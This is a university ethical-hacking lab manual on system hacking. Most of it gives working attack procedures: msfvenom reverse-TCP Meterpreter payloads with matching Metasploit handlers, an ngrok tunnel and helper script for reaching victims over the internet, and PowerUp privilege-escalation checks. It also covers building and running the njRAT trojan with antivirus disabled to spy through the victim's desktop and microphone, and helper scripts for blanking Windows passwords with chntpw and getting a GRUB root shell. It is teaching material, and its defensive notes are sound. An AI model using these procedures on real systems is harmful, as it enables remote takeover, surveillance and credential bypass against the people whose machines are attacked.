
College of Computer Science and Information Technology
Networks and Communications

CYS506 Ethical Hacking

Student Procedural Manual

2022/23

IMAM ABDULRAHMAN BIN FAISAL UNIVERSITY
College: College of Computer Science and Information Technology
Department: Networks and Communications
Course: Ethical Hacking (CYS 506)

Practical Session Plan

Session Topic/Title: System Hacking
Session No.: 5
Session Duration (Minutes): 120

1- Session Outcomes: Please list the Session Learning Outcomes (SLOs), as presented in the ABET Student Outcomes A to K.
Note: The sequence of instruction may vary and you may start with the most essential SLO. 1 is the most important one, followed by 2, 3 and 4, as per time availability.

1. Outcome A: Bypassing access controls to gain access to the system (for example, password cracking and vulnerability exploitation).
2. Outcome B: Acquiring the rights of another user or an administrator (privilege escalation).
3. Outcome C: Creating and maintaining remote access to the system (executing applications such as trojans, spyware, backdoors, and keyloggers).
4. Outcome D: Hiding the evidence of compromise (clearing logs).

2- Tool(s)/Software:

• Msfvenom
• Metasploit
• njRAT

3- Procedural steps (Tasks)

System hacking is the process of testing computer systems and software for security vulnerabilities that an attacker could exploit to gain access to an organization's systems and steal or misuse sensitive information.
System hacking has four phases:
• Gaining Access: Use techniques such as cracking passwords and exploiting vulnerabilities to obtain a foothold on the target system.
• Escalating Privileges: Exploit known vulnerabilities or misconfigurations in the OS and installed software to move from a low-privileged account to administrator or SYSTEM.
• Maintaining Access: Keep that level of access so that later actions, such as executing malicious applications or stealing, hiding, or tampering with sensitive system files, remain possible.
• Clearing Logs: Remain undetected by legitimate users and administrators by removing the log entries that correspond to the malicious activity.



Lab Tasks:
Part 1: Exploit Client-Side Vulnerabilities and Establish a VNC Session

Here, we will see how an attacker delivers a Meterpreter payload that the target user runs themselves (a client-side attack), then uses the resulting session to enumerate privilege-escalation opportunities and open a VNC view of the target desktop with Metasploit.

1- In the Kali Terminal, type msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=<IP Address of Host Machine> LPORT=444 -o /root/Desktop/Test.exe and press Enter. LHOST and LPORT are compiled into the executable, so they must match the handler you start in step 7.

2- This will generate Test.exe, a malicious file, on the Desktop, as shown in the screenshot.

Note: To navigate to the Desktop folder, click Places from the top section of the Desktop and click Home Folder from the drop-down options. In the attacker window, click File System from the left pane and navigate to /root/Desktop.


3- Now, create a directory to share this file with the target machine, set the permissions, and copy the file from the Desktop to the shared location using the commands below:

• Type mkdir /var/www/html/share and press Enter to create a shared folder.
• Type chmod -R 755 /var/www/html/share and press Enter.
• Type chown -R www-data:www-data /var/www/html/share and press Enter.
• Copy the malicious file to the shared location by typing cp /root/Desktop/Test.exe /var/www/html/share and pressing Enter.

Note: Here, the payload is delivered through a web share served by Apache; in a real engagement it would more often arrive as an email attachment, a download link, or on physical media such as a USB drive.



4- Now, start the Apache service. To do this, type service apache2 start and press Enter.

5- Type msfconsole and press Enter to launch the Metasploit Framework.

6- In msfconsole, type use exploit/multi/handler and press Enter.



7- Now, set the payload, LHOST, and LPORT. To do so, use the commands below:

• Type set payload windows/meterpreter/reverse_tcp and press Enter.
• Type set LHOST 10.10.10.13 and press Enter.
• Type set LPORT 444 and press Enter.

Note: LHOST is the Kali machine's IP address; you can find it by typing ifconfig in the terminal. The payload and LPORT must be identical to the values passed to msfvenom in step 1, otherwise the connect-back never reaches the handler.

8- After entering the above details, type exploit and press Enter to start the listener.

9- On the Windows 10 virtual machine, open any web browser (here, Mozilla Firefox). In the address bar, type http://10.10.10.13/share and press Enter. The shared folder contents are listed, as shown in the screenshot.
10- Click Test.exe to download the file.



11- Once you click the Test.exe file, the Opening Test.exe pop-up appears; select Save File.
12- The malicious file is downloaded to the browser's default download location (here, Downloads). Navigate to this location and double-click the Test.exe file to run it.

Note: An unencoded msfvenom executable is detected by Windows Defender; the lab Windows 10 VM is expected to have real-time protection turned off, as stated in Part 3.

13- Leave the Windows 10 virtual machine running, so that Test.exe keeps running in the background, and switch to the Kali virtual machine.
14- Observe that one session has been created or opened in the Meterpreter shell, as shown in the screenshot.


15- Type sysinfo and press Enter to verify that you have compromised the targeted Windows 10 machine.

Note: If the Meterpreter shell does not attach to the session automatically, type sessions -i 1 and press Enter to interact with it (sessions -l lists the session IDs).

16- Now, open another Kali Terminal and change to the root home directory (cd /root).
17- In the Terminal window, type git clone https://github.com/PowerShellMafia/PowerSploit and press Enter. The PowerSploit repository is downloaded to the root directory.


18- Now, switch back to the Terminal window with an active Meterpreter session. Type upload /root/PowerSploit/Privesc/PowerUp.ps1 PowerUp.ps1 and press Enter. This command uploads the PowerSploit script (PowerUp.ps1) to the target's current working directory.

19- Type shell and press Enter to open a command shell on the target. Observe that the current working directory is the Downloads folder, the directory from which Test.exe was launched.



20- Type powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1;Invoke-AllChecks" and press Enter to dot-source PowerUp.ps1 and run all of its checks. -ExecutionPolicy Bypass only overrides the script execution policy; it does not evade Defender or AMSI, which flag the unmodified PowerUp.ps1 on an up-to-date Windows 10.

Note: PowerUp.ps1 is a script that performs quick checks against a Windows machine for privilege escalation opportunities. It looks for service abuse opportunities, DLL hijacking, registry settings, and similar misconfigurations to enumerate common elevation paths on the target.

21- The result lists findings such as unquoted service paths, modifiable service executables, modifiable service arguments, writable DLL search locations, weak service permissions, unattended-install files with embedded credentials, and other locations. A finding is only exploitable if the current user can actually write to the path or object reported, which is why PowerUp prints the ModifiablePath and AbuseFunction details alongside each one.
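The first item in that list, unquoted service paths, is worth understanding rather than just reading off PowerUp's output. The following is an added example for this manual (not part of the lab or of PowerSploit): it re-creates that one check in shell so it can be studied on Kali against a constructed service inventory. Windows resolves an unquoted ImagePath such as C:\Program Files\Vuln App\bin\svc.exe by trying C:\Program.exe, then C:\Program Files\Vuln.exe, then the real binary, so every space in the executable's path is a potential hijack point, and the function prints those candidates. The inventory format (name|ImagePath), the service names and the paths are constructed for the example. What makes a hit exploitable is the ability to write into one of those intermediate directories; PowerUp checks that with Get-ModifiablePath, which this example leaves out.

```shell
# Added example: the unquoted-service-path condition that PowerUp reports,
# reimplemented in shell for study. Service names and paths are constructed.

# Given an unquoted ImagePath, print the executables Windows would try before
# the real one (the hijack candidates), one per line. No output = not affected.
unquoted_path_candidates() {
    printf '%s\n' "$1" | awk '
    {
        line = $0
        # A quoted path is resolved as one token; nothing to report.
        if (substr(line, 1, 1) == "\"") exit
        # Only the text up to and including .exe is the executable path;
        # anything after it is arguments and does not create hijack points.
        i = index(tolower(line), ".exe")
        if (i == 0) exit
        exe = substr(line, 1, i + 3)
        # CreateProcess tries to stop at every space in the unquoted path.
        n = split(exe, parts, " ")
        prefix = parts[1]
        for (k = 2; k <= n; k++) {
            print prefix ".exe"
            prefix = prefix " " parts[k]
        }
    }'
}

# Run the check over a "ServiceName|ImagePath" inventory read from stdin and
# print one "ServiceName<TAB>candidate" line per hijack point. On Windows the
# inventory would come from "wmic service get name,pathname"; here it is
# constructed data.
check_service_paths() {
    while IFS='|' read -r name path; do
        [ -n "$name" ] || continue
        unquoted_path_candidates "$path" | while IFS= read -r cand; do
            printf '%s\t%s\n' "$name" "$cand"
        done
    done
}

# Constructed inventory: one vulnerable service, one correctly quoted one and
# one Windows service whose path contains no spaces.
SAMPLE_SERVICES='VulnSvc|C:\Program Files\Vuln App\bin\svc.exe -k foo
SafeSvc|"C:\Program Files\Safe App\svc.exe" -k foo
Spooler|C:\Windows\System32\spoolsv.exe'

# Run the check over the constructed inventory.
demo_unquoted_paths() {
    printf '%s\n' "$SAMPLE_SERVICES" | check_service_paths
}

demo_unquoted_paths
```

Running it prints two candidates for VulnSvc (C:\Program.exe and C:\Program Files\Vuln.exe) and nothing for the other two services. The same logic explains why PowerUp's fix is simply to quote the path in the service's ImagePath registry value.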



22- Now, type exit and press Enter to return to the Meterpreter session.
23- Now, use the session to obtain a remote desktop view of the Windows 10 virtual machine. Type run vnc and press Enter. This does not exploit a VNC vulnerability: the Meterpreter script injects a VNC server into a process on the target and launches a VNC viewer on Kali through the existing session.

24- This opens a VNC session to the target machine, as shown in the screenshot. Through this session you can watch the victim's activity on the system, including the files, websites, software, and other resources the user opens or runs.



Part 2: Hacking Devices on the Internet (Outside your local network)

Most real attacks originate outside the victim's local network. A reverse_tcp payload needs a callback address the victim can reach, which a Kali VM behind NAT does not have. Ngrok is a tool that creates a tunnel from a public endpoint to a port on your machine: you start the ngrok agent from the command line, give it the local port to expose, and ngrok assigns a public hostname and port that forwards every connection to it. With a tcp tunnel this works for any TCP listener, including a Metasploit handler.

• You can follow this tutorial to set up Ngrok: https://youtu.be/LYmhwKVNjk4 (00:00 till 2:34)

1- Using any web browser, access the ngrok website (https://ngrok.com/download) and sign up.

2- Fill in the required information.



3- You will receive a verification email; open it and follow the link it contains.
4- Click Download for Linux.

5- Move to the Downloads folder in Kali Linux.

6- Run tar zxvf <the ngrok downloaded file> to extract the ngrok binary.
7- Every account has a unique authtoken. Copy the authtoken command shown in your browser dashboard and run it in the terminal; it stores the token in ngrok's configuration file so the agent can authenticate.


8- Now, in the terminal, type ./ngrok tcp 4444. Ngrok prints a Forwarding line of the form tcp://<ngrok server>:<ngrok port> -> localhost:4444; note both values.

o Make sure you have verified your account by clicking the link sent to you by email, otherwise the tunnel will not start.

9- In a new terminal, type msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=<ngrok server> LPORT=<ngrok port> -o evil.exe (here, <ngrok server> is 0.tcp.in.ngrok.io and the port is 14616). The payload must carry the public endpoint, not the Kali address, because that is the only address the victim can reach.

Note: On a free ngrok account the hostname and port change every time the agent is restarted, so the payload has to be rebuilt whenever the tunnel is.


10- Open msfconsole, type use exploit/multi/handler, and then set the following options:
• set payload windows/meterpreter/reverse_tcp
• set LHOST 0.0.0.0
• set LPORT 4444
• set ExitOnSession false
• exploit -j -z
The handler binds every local interface on port 4444, the port the ngrok agent forwards to; the public host and port belong in the payload only. ExitOnSession false keeps the listener alive for further victims, and exploit -j -z runs it as a background job without interacting with the first session. After you deliver the payload to the victim and the victim executes the file, a TCP session is established between attacker and victim, as in the figure below.
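Parts 1 and 2 differ only in where the payload must call back to, and a mismatch between the msfvenom options and the handler options is the usual reason for "no session". The following is an added example for this manual, not part of the lab or of Metasploit: a shell script for Kali that validates the callback address, reads the public endpoint for the Part 2 case from the ngrok agent's local API (http://127.0.0.1:4040/api/tunnels, which the agent serves while it runs), prints the matching msfvenom command, and writes the multi/handler options as a msfconsole resource script that can be loaded with msfconsole -r handler.rc. The ngrok API response embedded below is a constructed sample shaped like the real one; the hostname 0.tcp.in.ngrok.io and port 14616 are the lab's values.

```shell
# Added example: derive a consistent payload/handler pair for Part 1 (direct
# callback to Kali) and Part 2 (callback through an ngrok tcp tunnel).

# Return 0 if $1 is a dotted-quad IPv4 address with each octet in 0..255.
valid_ipv4() {
    local ip=$1 octet n=0
    local IFS=.
    case $ip in
        *.*.*.*) ;;
        *) return 1 ;;
    esac
    case $ip in .*|*.|*..*) return 1 ;; esac
    for octet in $ip; do
        case $octet in ''|*[!0-9]*) return 1 ;; esac
        [ "$octet" -le 255 ] || return 1
        n=$((n + 1))
    done
    [ "$n" -eq 4 ]
}

# Return 0 if $1 is a TCP port number in 1..65535.
valid_port() {
    case $1 in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Part 2: read the ngrok agent's tunnel list (JSON from its local API on
# stdin) and print "host port" of the first tcp:// public_url, e.g.
# "0.tcp.in.ngrok.io 14616". Prints nothing if there is no tcp tunnel.
ngrok_tcp_endpoint() {
    sed -n 's/.*"public_url" *: *"tcp:\/\/\([^:"]*\):\([0-9]*\)".*/\1 \2/p' | head -n 1
}

# Print the msfvenom command that builds an x86 reverse_tcp Meterpreter
# executable calling back to $1:$2 and written to $3.
msfvenom_cmd() {
    printf 'msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=%s LPORT=%s -o %s\n' "$1" "$2" "$3"
}

# Print a msfconsole resource script for a handler bound to $1:$2.
# ExitOnSession false and -j -z keep the listener up for further callbacks.
handler_rc() {
    printf 'use exploit/multi/handler\n'
    printf 'set payload windows/meterpreter/reverse_tcp\n'
    printf 'set LHOST %s\n' "$1"
    printf 'set LPORT %s\n' "$2"
    printf 'set ExitOnSession false\n'
    printf 'exploit -j -z\n'
}

# Part 1 plan: the payload calls Kali directly, so both sides use the same
# address and port. Usage: plan_part1 <kali-ip> <port> <outfile>
plan_part1() {
    valid_ipv4 "$1" || { echo "LHOST must be an IPv4 address: $1" >&2; return 1; }
    valid_port "$2" || { echo "LPORT must be 1..65535: $2" >&2; return 1; }
    msfvenom_cmd "$1" "$2" "$3"
    handler_rc "$1" "$2"
}

# Part 2 plan: the payload carries ngrok's public host and port, while the
# handler binds all local interfaces on the port the agent forwards to.
# Usage: plan_part2 <local-port> <outfile>   (ngrok API JSON on stdin, e.g.
#   curl -s http://127.0.0.1:4040/api/tunnels | plan_part2 4444 evil.exe)
plan_part2() {
    local endpoint host port
    valid_port "$1" || { echo "local port must be 1..65535: $1" >&2; return 1; }
    endpoint=$(ngrok_tcp_endpoint)
    [ -n "$endpoint" ] || { echo "no tcp tunnel in ngrok API output" >&2; return 1; }
    host=${endpoint% *}
    port=${endpoint#* }
    msfvenom_cmd "$host" "$port" "$2"
    handler_rc 0.0.0.0 "$1"
}

# Constructed sample of the agent's /api/tunnels response for "ngrok tcp 4444".
SAMPLE_NGROK_JSON='{"tunnels":[{"name":"command_line","public_url":"tcp://0.tcp.in.ngrok.io:14616","proto":"tcp","config":{"addr":"localhost:4444","inspect":false}}],"uri":"/api/tunnels"}'
```

Save the handler_rc lines to handler.rc and start the listener with msfconsole -r handler.rc, then run the printed msfvenom command. If a session never arrives, compare the LHOST/LPORT in the msfvenom line with the set lines of the handler: in Part 1 they must be identical, in Part 2 they must differ exactly as printed (public endpoint in the payload, 0.0.0.0 and the local port in the handler).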


11- This concludes our lab on hacking devices on the internet.

12- Read about TheFatRat, which wraps msfvenom and adds further payload and packaging options.



Part 3: System Hacking Using Remote Access Trojan (RAT)

A computer Trojan is a program that hides malicious code inside apparently harmless software or data so that, once run, it can take control of the system and cause damage, such as corrupting the file system on the disk.

njRAT is a remote access Trojan (RAT) that gives an attacker remote access to a victim's computer. It is typically spread through phishing emails or malicious downloads, and once installed on a victim's computer it lets the attacker perform a variety of actions, such as:

Stealing sensitive data: njRAT can be used to steal passwords, login credentials, credit card numbers, and other sensitive data from the victim's computer.

Remote control: The attacker can take remote control of the victim's computer and use the system as if they were physically present in front of it.

Installing additional malware: njRAT can be used to download and install additional malware on the victim's computer.

Spying: The attacker can use njRAT to spy on the victim's activities, for example by recording keystrokes or capturing screenshots.

Denial of Service (DoS) attacks: infected machines can be used to launch DoS attacks against websites or other targets.



1- From any web browser, open the following link to download njRAT Green Edition (https://github.com/adarift/njRAT). Click on Releases.

2- Click on njRAT Green Edition to start the download.

Note: Ensure that Windows Defender and any other antivirus programs are turned off; njRAT is real malware and is detected by every current antivirus engine. Do this only in an isolated lab VM. If the browser also blocks the download, see:
https://www.technipages.com/how-to-stop-chrome-from-blocking-downloads/#:~:text=Chrome%3A%20How%20to%20Stop%20the%20Browser%20from%20Blocking%20Your%20Downloads&text=Go%20to%20Settings%20and%20click,No%20Protection%20(Not%20recommended).


3- Extract the downloaded archive and double-click njRAT to start the program.



4- The application starts and asks which port to listen on for incoming connections; choose port 7777 and click Start.

Note: If the port is already in use on the system, the application reports that the port is busy; choose another port and use the same value in the builder in step 6.

5- The following user interface appears. At the bottom right of the window, click Builder.



6- The builder window appears; from here you can customize the Trojan. In the Host field type your IP address, or leave the default (127.0.0.1), then press the + sign. After adding the host, press Build. The host and port are the address the generated Server.exe connects back to, so 127.0.0.1 only works when Server.exe is run on the same machine as the njRAT console, as in this lab.

7- After the Trojan is created, save it to the Desktop. Double-click the Server.exe file.


8- The Trojan starts and connects back from the victim's computer to the listening njRAT console.

9- Right-click the victim's computer in the njRAT console and click Manager.



10- The following window appears; from this window you can browse the entire file system.

11- Click the Connections tab at the top of the console. From this tab, you can see all the victim's network connections and kill any of them.


12- Click the Registry tab at the top of the console. From this tab, you can browse and modify the Windows registry.

13- Click Remote Shell at the top of the console. From this tab, you can execute CMD commands.


14- Now, go back to the main console and click Remote Desktop.

15- From this service, you can view and control the victim's desktop.


16- Go back to the main console and click Microphone.

17- From this service, you can listen to the victim's microphone.

18- Go back to the main console and click Open Chat.



19- This service lets the attacker exchange messages with the victim.

20- This concludes the demonstration of the njRAT tool.


4- Assessment Plan: questions/tasks to confirm that students have achieved each of the above SLOs. Outcome 1 is the most important one, followed by 2, 3 and 4, as per time availability. The questions/tasks below are just for guidance and the laboratory instructor can come up with his own questions/tasks.

5- Resources: Suggest further resources for the students to manage their learning after the class. Make sure that the resources are specific and different to suit all students, e.g. Figures, Tables, Links, etc.



Part 4: Extra System Hacking Tactics, Techniques, and Procedures (Optional)

Part 4 is an optional section of the System Hacking laboratory material for those who want to explore the topic more deeply. It is not mandatory and is included for general knowledge only: Parts 1 to 3 cover everything required for this session and provide a solid foundation on system hacking.

Part 4 includes the following activities:

• Bypass Windows Login Screen
• Bypass MAC OS Login Screen
• Bypass Linux Login Screen
• Windows Privilege Escalation
• Antivirus backdoor evasion
• Advanced Antivirus Evasion Techniques
• USB Rubber Ducky
• Active Directory Intrusion
• System Hacking Using Remote Desktop Protocol (RDP)
• System Hacking Using FTP Protocol
• System Hacking Using SMB Protocol
• System Hacking Using SSH Protocol
• Hacking MacOS and Linux Systems
• Perform Buffer Overflow Attack to Gain Access to a Remote System

Disclaimer: Part 4 of the System Hacking lab is designed to provide educational information on the techniques used by attackers to gain unauthorized access to computer systems and to raise awareness of potential vulnerabilities. The content and activities in the lab are for educational purposes only, and the authors do not intend them for any illegal or malicious activity.



Part 4.1: Bypass Windows Login Screen

The Windows login screen is the first screen that appears when a user starts their computer. It prompts for a username and password before granting access to the operating system, and it is the control that keeps unauthorized users away from the computer's resources and data while Windows is running.

The SAM (Security Accounts Manager) hive is the registry database that stores local account information, including usernames and NT password hashes. It lives in Windows\System32\config\SAM. While Windows is running the file is held open exclusively by the kernel, so even an administrator cannot copy it directly (tools use reg save or a Volume Shadow Copy instead), and the hashes inside it are encrypted with a key derived from the SYSTEM hive in the same directory (the boot key).

When a user enters a username and password at the login screen, Windows hashes the entered password and compares the result with the hash stored in the SAM. If the hashes match, the user is logged on and their profile is loaded.

Because the SAM is protected only by the running operating system, anyone who can boot the machine from other media and read the disk can copy the hive for offline cracking or, as in this lab, rewrite it with chntpw. chntpw does not need to decrypt the hashes: blanking a password simply removes the stored hash. The change affects local accounts only, since Microsoft accounts and domain accounts do not authenticate against the local SAM. The effective defences are full-disk encryption (BitLocker), which leaves nothing readable to the live system, and a firmware password with Secure Boot, which prevents booting from arbitrary media in the first place.

1- Using a web browser, access the Kali Linux download page and download the Kali Live Boot image, which will be used to boot the victim's computer from a USB drive.



2- From your web browser, access the Rufus website (https://rufus.ie/en/) and download the Rufus program.

3- Run Rufus. Choose your USB device from the Device list, then select the Kali Live Boot image and click Start.



4- After Rufus has finished writing the bootable USB, restart the target computer with the USB drive attached.



5- As the device reboots, immediately press F12 to open the firmware boot menu. Choose UEFI: SanDisk, Partition 1 and press Enter.

Note: The boot-menu key (F12, F2, Esc, Del) and the device name differ between vendors and in your lab. The Kali live image is not signed for Secure Boot, so Secure Boot must be disabled in the firmware; if the firmware is password-protected, this step fails, which is exactly the control a defender relies on.

6- The Kali Linux Live Boot start page appears; press Enter on Live System (amd64).



7- In the file manager, click the Windows disk to mount it and view its file system. Kali mounts it under /media/kali/<Disk name>.

8- Copy the path to the mounted disk and open a new terminal.



9- In the terminal, type cd /media/kali/<Disk name>/Windows/System32

10- Now type cd config. Then type ls | grep SAM to confirm that the hive exists. After this, type chntpw -i SAM to open the hive in interactive mode.

Note: If the volume is mounted read-only (Kali reports the disk as unclean when Windows was shut down with Fast Startup or hibernation), chntpw cannot write the hive. Boot Windows, shut it down fully (shutdown /s /t 0 ignores Fast Startup), and retry. If the disk is BitLocker-encrypted, no Windows directory is visible at all.



11- The chntpw menu appears. Type 1 (Edit user data and passwords) and press Enter, then choose the account to edit by entering its RID from the user list.

12- In the user edit menu, type 1 and press Enter to clear (blank) the user's password, then type 2 and press Enter to unlock and enable the account in case it is locked or disabled.


13- Press q and Enter to return to the user list.



14- You are back in the chntpw main menu; press q and Enter to quit.

15- Type y to write the changes to the SAM hive. Without this step nothing is changed on disk.



16- Remove the USB drive and restart the device to boot back into Windows.

17- The account now has no password, so you can log on and access all of its files. The change is visible to the user, so this is a bypass rather than a stealthy attack.

18- This concludes the demonstration of bypassing the Windows login screen.
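Steps 9 and 10 assume that the Windows volume is mounted read-write and that the hive is spelled exactly Windows/System32/config/SAM. The following is an added example for this manual (not part of the lab or of chntpw) that does the same locating plus the two pre-checks that decide whether step 15 can actually save: it finds the hive case-insensitively under whatever Kali mounted, warns if the directory is not writable or if a hiberfil.sys suggests a Fast Startup/hibernated volume (which ntfs-3g mounts read-only), and lists the local accounts with chntpw -l so the RID for step 11 is known in advance. The mount point /media/kali/<Disk name> is the lab's; the directory tree used to exercise the functions is constructed.

```shell
# Added example: locate the SAM hive on a mounted Windows volume and run the
# pre-checks the interactive chntpw edit depends on.

# Print the path of the SAM hive under mount root $1. NTFS preserves the case
# the files were created with, so match the Windows path case-insensitively.
# Returns 1 (and prints nothing) if there is no hive, e.g. wrong disk or a
# BitLocker volume that Kali could not open.
find_sam_hive() {
    find "$1" -maxdepth 4 -type f -ipath '*/windows/system32/config/sam' 2>/dev/null \
        | head -n 1 | grep .
}

# Return 0 if directory $1 accepts a new file. A read-only mount is the usual
# reason chntpw reports that it could not write the hive.
dir_is_writable() {
    local probe="$1/.chntpw-rw-probe.$$"
    : > "$probe" 2>/dev/null || return 1
    rm -f "$probe"
}

# Check mount root $1 and print the hive path on success. Warnings go to
# stderr so the path can be captured with $(...).
sam_precheck() {
    local root=$1 hive confdir
    hive=$(find_sam_hive "$root") \
        || { echo "no SAM hive under $root (wrong disk, or BitLocker is enabled?)" >&2; return 1; }
    confdir=$(dirname "$hive")
    # hiberfil.sys exists while Fast Startup or hibernation is enabled; if
    # Windows was shut down that way the volume is marked in use and ntfs-3g
    # mounts it read-only. A full shutdown (shutdown /s /t 0) clears this.
    if [ -e "$root/hiberfil.sys" ]; then
        echo "warning: $root/hiberfil.sys present; volume may be hibernated and read-only" >&2
    fi
    if ! dir_is_writable "$confdir"; then
        echo "warning: $confdir is not writable; chntpw will not be able to save" >&2
    fi
    printf '%s\n' "$hive"
}

# List the local accounts and RIDs in hive $1 (chntpw -l) before choosing one
# to edit with chntpw -i.
list_sam_users() {
    command -v chntpw >/dev/null 2>&1 \
        || { echo "chntpw is not installed (apt install chntpw)" >&2; return 1; }
    chntpw -l "$1"
}

# Usage on the live system, where Kali auto-mounted the Windows disk:
#   hive=$(sam_precheck "/media/kali/<Disk name>") && list_sam_users "$hive"
```

The writability probe is the check that matters most: chntpw reports a write failure only at the very end, after the interactive edits, so knowing beforehand saves repeating steps 11 to 15.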




Part 4.2: Bypass MAC OS Login Screen

The macOS login screen is the first screen that appears when you start up your Mac. It prompts you to enter your username and password to access your account. The login screen is usually customized with a background image and displays the names of the user accounts that have been set up on the computer.

macOS does not keep the account password itself. It stores a salted, iterated hash of the password in the local directory service node (the user's record under /var/db/dslocal/nodes/Default/users/), which only root can read. The Keychain is a separate store for saved passwords, certificates and other secrets; it is encrypted with the login password rather than holding it.

When you enter your password on the login screen, macOS hashes the entered value and compares it with the stored hash. A hash is the fixed-length output of a one-way function, so the stored value cannot be turned back into the password, which is why storing it is safer than storing the password in plain text. If the hashes match, macOS grants access to the account and unlocks the login keychain; if not, the user is prompted to try again or reset the password.

The reset below relies on macOS Recovery, which can change any local account's password when nothing protects the disk. It is blocked by FileVault (the volume cannot be modified until it is unlocked with a user password or the recovery key) and, on Intel Macs, by a firmware password that prevents booting into Recovery; on Apple silicon Macs, Recovery typically asks for the password of an existing administrator before its tools can be used.

1- Restart your macOS computer.



2- Immediately after the Apple logo appears, press and hold Command+R until the Recovery screen appears.



3- The Recovery screen appears. From the menu bar at the top, click Utilities and then Terminal.

4- A Terminal prompt appears; type resetpassword and press Enter.



5- The Reset Password utility opens, and you can choose an account and set a new password for it. The new password does not unlock the user's existing login keychain (it was encrypted with the old password), so the user notices the change at the next login and the secrets saved in that keychain remain out of reach.



Part 4.3: Bypass Linux Login Screen

The Linux login screen, also known as the login manager or display manager, is the graphical user interface that appears when a user boots a Linux system. It prompts the user for a username and password to gain access to the system.

The exact appearance of the login screen varies with the distribution and the chosen desktop environment, but it typically includes a login prompt, a password field, and a list of available users. Some login screens also offer password strength indicators, session selection, and accessibility options.

The login screen itself is rarely the weak point. Like any software it can have vulnerabilities (authentication bugs, brute-forceable passwords, memory-safety flaws), but the bypass shown here does not exploit any of them: it uses physical access to the boot loader. Anyone who can edit the GRUB entry can tell the kernel to start a shell instead of init, and that shell runs as root before any login manager exists.

Distributions patch login-screen components like any other package, and users can harden their systems with strong unique passwords, two-factor authentication and timely updates. Against the boot-loader attack below the relevant controls are different: a GRUB password (so entries cannot be edited without authenticating), full-disk encryption (the root file system cannot be reached without the passphrase), and a firmware password so the machine cannot simply be booted from other media instead.

1- At the GRUB boot menu, highlight the entry you want to boot and press e to edit it.



2- The boot configuration for that entry appears. On the line that starts with linux (around line 10 in the screenshot), change ro (read-only) to rw (read-write) and, after quiet splash, append init=/bin/bash so the kernel starts a shell instead of init. Then press Ctrl+x to boot with the edited parameters. The edit is not saved; it applies to this boot only.



3- The system boots directly into a root shell; no login is required because the login manager is never started.

4- Type passwd root and press Enter, then provide the new root password. If you left ro in place, the root file system is mounted read-only and passwd fails; run mount -o remount,rw / first.

5- Type sync to flush the change to disk, then reboot with reboot -f (there is no init process to handle a clean shutdown). At the next boot the root account password has been changed.
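The edit in step 2 is a one-line text change, but the details (which token to change, what happens if ro is left alone) are easy to get wrong in the few seconds the GRUB editor is open, and the defence is a boot-loader configuration check rather than a login-screen setting. The following is an added example for this manual (not part of the lab or of GRUB): the first function applies the step 2 edit to a copy of a kernel line so the exact result can be seen before it is typed, and the second checks a grub.cfg for the set superusers and password_pbkdf2 directives that make GRUB require authentication before an entry can be edited. The kernel line and the two grub.cfg fragments are constructed samples, and the PBKDF2 hash in them is a placeholder; set superusers and password_pbkdf2 are the real directives grub-mkconfig writes when a GRUB password is configured.

```shell
# Added example: the GRUB kernel-line edit from step 2, and a check for the
# GRUB password that stops it. All sample data below is constructed.

# Rewrite a GRUB "linux ..." line the way step 2 does: ro -> rw so the root
# file system is mounted read-write, and init=/bin/bash appended so the kernel
# runs a shell as PID 1 instead of init. If the line has no ro token, rw is
# added anyway; without it passwd in the resulting shell fails on a read-only /.
grub_root_shell_line() {
    local line=$1
    line=$(printf '%s\n' "$line" \
        | sed -e 's/\([[:space:]]\)ro$/\1rw/' \
              -e 's/\([[:space:]]\)ro\([[:space:]]\)/\1rw\2/')
    case " $line " in
        *" rw "*) ;;
        *) line="$line rw" ;;
    esac
    printf '%s init=/bin/bash\n' "$line"
}

# Return 0 if grub.cfg $1 protects the menu: a superusers list plus a
# password_pbkdf2 (or plain password) entry. Without both, anyone at the
# console can press e and apply the edit above.
grub_cfg_requires_password() {
    grep -q '^[[:space:]]*set[[:space:]][[:space:]]*superusers=' "$1" \
        && grep -Eq '^[[:space:]]*password(_pbkdf2)?[[:space:]]' "$1"
}

# Constructed kernel line as shown by the GRUB editor on a Kali/Debian system.
SAMPLE_LINUX_LINE='linux /boot/vmlinuz-5.18.0-kali5-amd64 root=UUID=1234-abcd ro quiet splash'

# Constructed grub.cfg fragments: one unprotected, one with a password set
# (the hash is a placeholder, not a real grub-mkpasswd-pbkdf2 output).
SAMPLE_GRUB_OPEN='set default="0"
set timeout=5
menuentry "Kali GNU/Linux" {
    linux /boot/vmlinuz root=UUID=1234-abcd ro quiet splash
}'
SAMPLE_GRUB_LOCKED='set superusers="root"
password_pbkdf2 root grub.pbkdf2.sha512.10000.PLACEHOLDERHASH
set default="0"
menuentry "Kali GNU/Linux" --unrestricted {
    linux /boot/vmlinuz root=UUID=1234-abcd ro quiet splash
}'
```

With set superusers and password_pbkdf2 in place, pressing e at the menu prompts for the superuser password; entries marked --unrestricted still boot without it, so normal users are not locked out. Configure the password through the scripts in /etc/grub.d (grub-mkpasswd-pbkdf2 generates the hash) and re-run update-grub rather than editing grub.cfg by hand, which is overwritten on the next kernel update.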

Part 4.4: Windows Privilege Escalation

Windows Privilege Escalation is the process of gaining elevated permissions or privileges
on a Windows-based computer system beyond what is normally granted to a user. Privilege
escalation is a common technique used by attackers to gain access to sensitive resources
and data on a computer system.

In a Windows environment, there are several levels of privileges that a user can have, ranging
from basic user-level access to administrator-level access. Basic user-level access is the
most restrictive, while administrator-level access allows a user to make changes to the
system configuration, install software, and perform other privileged operations.

An attacker who gains access to a Windows system with basic user-level access may attempt
to escalate their privileges to administrator-level access to gain more control over the
system. There are several techniques that attackers may use to achieve this goal, including:

Exploiting vulnerabilities: Attackers may exploit vulnerabilities in the Windows operating
system or other software installed on the system to gain elevated privileges.

Using default credentials: Attackers may try to use default or weak credentials to gain access
to administrative accounts.

Stealing credentials: Attackers may use techniques like keylogging or phishing to steal login
credentials for administrative accounts.

Leveraging misconfigurations: Attackers may exploit misconfigurations or weak security
settings on the system to gain elevated privileges.

Once an attacker has gained elevated privileges on a Windows system, they can perform a wide
range of malicious activities, such as installing malware, stealing sensitive data, or launching
further attacks on other systems.

To prevent privilege escalation attacks, it is important to follow best practices for securing
Windows systems, such as using strong passwords, limiting administrative access to only
those who need it, keeping software up-to-date with security patches, and using security
tools like firewalls and anti-virus software.

